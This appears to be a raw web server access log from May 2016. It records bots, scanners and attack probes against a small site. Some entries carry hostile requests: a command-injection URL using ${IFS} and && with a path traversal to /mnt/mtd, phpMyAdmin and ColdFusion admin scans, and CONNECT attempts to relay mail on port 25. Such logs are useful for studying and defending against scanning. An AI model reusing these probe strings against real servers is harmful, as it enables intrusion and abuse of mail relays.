69.30.210.242 - - [11/May/2016:10:13:00 +0200] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
61.231.2.225 - - [11/May/2016:12:11:37 +0200] "CONNECT 163mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
141.212.122.161 - - [11/May/2016:12:33:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
80.86.94.7 - - [11/May/2016:13:13:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; WBSearchBot/1.1; +http://www.warebay.com/bot.html)"
137.226.113.4 - - [11/May/2016:13:51:34 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
66.249.78.44 - - [11/May/2016:14:55:52 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.30 - - [11/May/2016:14:55:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
169.229.3.91 - - [11/May/2016:15:10:55 +0200] ",\xca\xfdB\xf6u\x87&l\x9e\x15\xf5\xd35\x02\vOh\xb2\x87\x7f\x07D" 400 329 "-" "-"
169.229.3.91 - - [11/May/2016:15:48:58 +0200] "\xdfHY;/!\xb5\xc1\x9b\xe9\vj \xb7\xa6\xc4\xd9\xef\xb7\x07\xe8\x9c\xd8\xbd\xd7<\x93M\xbd\xcf\xa1\xe5\x91\xb2v\xbe\x18\xbe\xc0\x91\x98\xff\xd9\xf8\x0f\xf2J\x93\x1a=\xe1\x81\x97Y\x0f7\xcbB" 400 329 "-" "-"
169.229.3.91 - - [11/May/2016:16:13:09 +0200] "i\xe0\\\x9f\xda!\xb8\x12`\xd2\xb4\xcc\x96\x1f\xa3`\xd9" 501 332 "-" "-"
141.212.122.161 - - [11/May/2016:17:48:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
193.92.3.66 - - [11/May/2016:18:35:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:35:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
173.208.136.114 - - [11/May/2016:18:37:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
193.92.3.66 - - [11/May/2016:18:38:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:45:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:45:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:46:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
137.226.113.4 - - [11/May/2016:18:47:21 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
193.92.3.66 - - [11/May/2016:18:47:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:48:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:49:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [11/May/2016:18:50:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
52.51.71.162 - - [11/May/2016:19:09:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
141.212.122.161 - - [11/May/2016:19:10:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
137.226.113.4 - - [11/May/2016:19:24:15 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
137.226.113.4 - - [11/May/2016:20:29:18 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
71.6.165.200 - - [11/May/2016:21:29:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.165.200 - - [11/May/2016:21:29:29 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
71.6.165.200 - - [11/May/2016:21:29:30 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
198.20.87.98 - - [11/May/2016:21:40:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
198.20.87.98 - - [11/May/2016:21:40:16 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
198.20.87.98 - - [11/May/2016:21:40:16 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
52.51.71.162 - - [11/May/2016:22:17:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
5.175.207.101 - - [11/May/2016:22:32:14 +0200] "GET /images/stories/pageinfo.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
141.212.122.161 - - [11/May/2016:22:41:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
52.51.71.162 - - [11/May/2016:23:24:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
52.51.71.162 - - [12/May/2016:00:04:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
36.226.247.91 - - [12/May/2016:00:08:28 +0200] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
36.226.247.91 - - [12/May/2016:00:08:31 +0200] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
52.51.71.162 - - [12/May/2016:00:10:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
52.51.71.162 - - [12/May/2016:00:29:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
52.51.71.162 - - [12/May/2016:00:52:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
52.51.71.162 - - [12/May/2016:01:09:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
66.249.78.201 - - [12/May/2016:01:19:29 +0200] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.187 - - [12/May/2016:01:19:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.59.59.52 - - [12/May/2016:01:39:34 +0200] "GET http://www.qunar.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
52.5.133.46 - - [12/May/2016:02:39:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "woobot/1.1"
52.5.133.46 - - [12/May/2016:02:39:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "woobot/1.1"
141.212.122.161 - - [12/May/2016:02:58:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
193.92.3.66 - - [12/May/2016:03:25:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:26:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:27:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:30:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:30:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:31:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:32:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:33:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:41:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.92.3.66 - - [12/May/2016:03:42:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:03:56:21 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
52.51.71.162 - - [12/May/2016:05:20:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
67.79.37.250 - - [12/May/2016:05:42:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
67.79.37.250 - - [12/May/2016:05:42:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
67.79.37.250 - - [12/May/2016:05:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0"
67.79.37.250 - - [12/May/2016:05:42:44 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0"
67.79.37.250 - - [12/May/2016:05:42:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
67.79.37.250 - - [12/May/2016:05:42:48 +0200] "GET /readme.html HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
67.79.37.250 - - [12/May/2016:05:42:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
67.79.37.250 - - [12/May/2016:05:42:51 +0200] "GET /language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DWPXY%3EfJ24&&tar$%7BIFS%7D/string.js HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
67.79.37.250 - - [12/May/2016:05:42:52 +0200] "GET /../../../../../../../mnt/mtd/fJ24 HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
67.79.37.250 - - [12/May/2016:05:42:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4"
107.150.46.36 - - [12/May/2016:05:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.46.37 - - [12/May/2016:06:46:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.197.185.21 - - [12/May/2016:07:01:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.61 - - [12/May/2016:07:07:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
52.51.71.162 - - [12/May/2016:07:39:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
107.150.46.35 - - [12/May/2016:07:44:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
66.249.78.64 - - [12/May/2016:07:54:53 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.64 - - [12/May/2016:07:54:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.150.46.37 - - [12/May/2016:08:25:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
141.212.122.161 - - [12/May/2016:09:02:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
141.212.122.161 - - [12/May/2016:09:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
98.143.148.107 - - [12/May/2016:10:15:50 +0200] "GET /check HTTP/1.1" 404 310 "-" "Mozilla/5.0 Project 25499 (project25499.com)"
107.150.32.60 - - [12/May/2016:11:13:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.46 - - [12/May/2016:11:45:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.179 - - [12/May/2016:12:01:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.59 - - [12/May/2016:12:05:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.59 - - [12/May/2016:12:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
169.229.3.91 - - [12/May/2016:12:49:53 +0200] "p\xf5\xe3\xaa\x8f" 501 320 "-" "-"
69.197.185.19 - - [12/May/2016:13:12:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.17.182 - - [12/May/2016:13:30:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.46 - - [12/May/2016:14:16:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
169.229.3.91 - - [12/May/2016:14:22:40 +0200] "\xf7\x9a\xbc\x1a\beC\xe55y5\xee\\\xf0\xb3\xd8\xd6" 501 332 "-" "-"
111.248.114.75 - - [12/May/2016:14:45:25 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
74.91.17.182 - - [12/May/2016:14:50:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.43 - - [12/May/2016:15:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
13.75.92.149 - - [12/May/2016:15:52:09 +0200] "GET /CFIDE/administrator/ HTTP/1.1" 404 325 "-" "-"
111.248.119.218 - - [12/May/2016:16:05:43 +0200] "CONNECT 126mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
74.91.18.43 - - [12/May/2016:16:36:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
137.226.113.4 - - [12/May/2016:17:12:30 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
74.91.20.195 - - [12/May/2016:18:49:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
123.59.59.52 - - [12/May/2016:19:29:11 +0200] "GET http://www.qunar.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
74.91.17.180 - - [12/May/2016:19:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.197 - - [12/May/2016:19:56:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
36.229.232.161 - - [12/May/2016:19:57:39 +0200] "CONNECT 126mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
137.226.113.4 - - [12/May/2016:20:17:30 +0200] "HEAD / HTTP/1.1^M" 400 - "-" "-"
107.182.24.28 - - [12/May/2016:20:21:40 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:40 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:40 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:42 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:42 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:42 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:42 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:43 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:44 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:45 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:45 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:45 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:45 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:45 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:46 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:48 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:49 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:49 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:49 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:50 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
107.182.24.28 - - [12/May/2016:20:21:53 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
120.132.50.135 - - [12/May/2016:21:20:11 +0200] "GET http://www.mafengwo.cn/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
123.59.59.52 - - [12/May/2016:22:19:43 +0200] "GET http://www.mafengwo.cn/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
63.85.168.52 - - [12/May/2016:22:31:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
63.85.168.52 - - [12/May/2016:22:31:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
63.85.168.52 - - [12/May/2016:22:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0"
63.85.168.52 - - [12/May/2016:22:31:58 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0"
63.85.168.52 - - [12/May/2016:22:32:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
63.85.168.52 - - [12/May/2016:22:32:14 +0200] "GET /readme.html HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
63.85.168.52 - - [12/May/2016:22:32:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
63.85.168.52 - - [12/May/2016:22:32:31 +0200] "GET /language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DueXt%3EbM4T&&tar$%7BIFS%7D/string.js HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
63.85.168.52 - - [12/May/2016:22:32:39 +0200] "GET /../../../../../../../mnt/mtd/bM4T HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36"
63.85.168.52 - - [12/May/2016:22:32:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
222.186.34.186 - - [12/May/2016:22:58:25 +0200] "GET https://m.baidu.com/ HTTP/1.1" 200 1229 "-" "HttpClient"
36.229.247.64 - - [13/May/2016:00:42:15 +0200] "CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
64.246.165.10 - - [13/May/2016:05:02:58 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.10 - - [13/May/2016:05:02:59 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/schraeg-senkrechtaufzuege.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
5.39.222.159 - - [13/May/2016:05:32:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
5.39.222.159 - - [13/May/2016:05:38:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
